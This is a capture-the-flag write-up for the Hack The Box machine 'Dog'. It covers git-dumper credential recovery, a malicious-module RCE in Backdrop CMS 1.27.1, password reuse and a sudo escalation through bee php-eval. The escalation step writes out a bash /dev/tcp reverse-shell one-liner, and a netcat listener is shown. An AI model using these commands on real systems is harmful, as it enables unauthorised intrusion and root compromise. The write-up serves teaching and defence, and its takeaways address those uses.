HTB: Dog

From an exposed .git directory to root — extracting credentials from source history, exploiting an authenticated RCE in BackdropCMS, and escalating via a NOPASSWD sudo rule on the Backdrop CLI.

Enumeration

An Nmap scan of the target returned two open ports: 22 (SSH) and 80 (HTTP). The web server was running Apache and serving a Backdrop CMS installation. Standard directory enumeration with ffuf quickly flagged an exposed /.git directory — publicly readable with no restrictions.

nmap -sV -sC -oA dog 10.10.11.x
ffuf -u http://dog.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt
# Found: /.git/ (200 OK)

An accessible .git directory on a public web server is always worth investigating thoroughly — the entire commit history, including deleted files and configuration changes, is recoverable.

Git Repository Extraction

Using git-dumper, I pulled down the full repository contents from the exposed directory, reconstructing the project's file structure and commit history locally.

git-dumper http://dog.htb/.git/ ./dog-repo
cd dog-repo
git log --oneline

Reviewing the repository files, I found settings.php — the Backdrop CMS configuration file — which contained database credentials. The database password didn't work on the CMS login page, but continuing to dig through the git history and user-related files turned up a list of email addresses associated with registered CMS accounts. One of those accounts, belonging to a user named Tiffany, accepted the database password as her login credential.

grep -r "password\|user\|mail" ./dog-repo/settings.php

Initial Access — BackdropCMS Authenticated RCE

Logged in as Tiffany with administrator privileges, I identified the CMS version as Backdrop CMS 1.27.1. This version contains an authenticated remote code execution vulnerability — an admin user can install a malicious module archive containing arbitrary PHP code.

I created a malicious Backdrop module with a PHP reverse shell payload embedded in it, packaged it as a .zip archive in the correct module directory structure, and installed it through the CMS admin panel:

# Module structure
evil_module/
  evil_module.info   (valid Backdrop module metadata)
  evil_module.php    (PHP reverse shell payload)

zip -r evil_module.zip evil_module/

After installation, navigating to the module's PHP file triggered the reverse shell back to my listener, landing me as www-data.

nc -lvnp 4444
# Shell received as www-data

Lateral Movement to johncusack

With a shell as www-data, I enumerated the system for credentials. The settings.php file on the live server (and within the git dump) contained a database password. Testing this credential against local user accounts via SSH revealed it worked for the user johncusack — another instance of password reuse enabling straightforward lateral movement.

ssh [email protected]
# Password: [credential from settings.php]

I collected the user flag from johncusack's home directory and moved on to privilege escalation.

Privilege Escalation — Sudo Abuse via bee CLI

Running sudo -l as johncusack revealed a critical misconfiguration:

sudo -l
# (ALL : ALL) NOPASSWD: /usr/local/bin/bee

bee is the official Backdrop CMS command-line utility, analogous to Drupal's drush. The NOPASSWD directive meant it could be executed as root without a password. The bee tool supports a php-eval subcommand that evaluates arbitrary PHP expressions in the context of the CMS — which, when run as root, results in OS-level command execution as root.

sudo bee --root /var/www/html php-eval 'system("bash -c \"bash -i >& /dev/tcp/10.10.14.x/4444 0>&1\"");'

The reverse shell connected as root. Flag retrieved.

Takeaways

Exposed .git directories are a high-value finding on web servers — git history can expose credentials, internal configuration, deprecated endpoints, and developer notes that never made it to production but were committed at some point.
CMS version management matters. Backdrop 1.27.1's authenticated RCE would not have been exploitable without admin access — but credential reuse from the settings file provided exactly that. Defence-in-depth would have stopped this chain at multiple points.
Sudo rules on CMS CLI tools are a well-known escalation vector. Any tool with eval, exec, or plugin functionality that can be run with elevated privileges should be considered equivalent to giving that user a root shell.
Password reuse across the database, CMS admin account, and SSH user account made every stage of lateral movement trivial.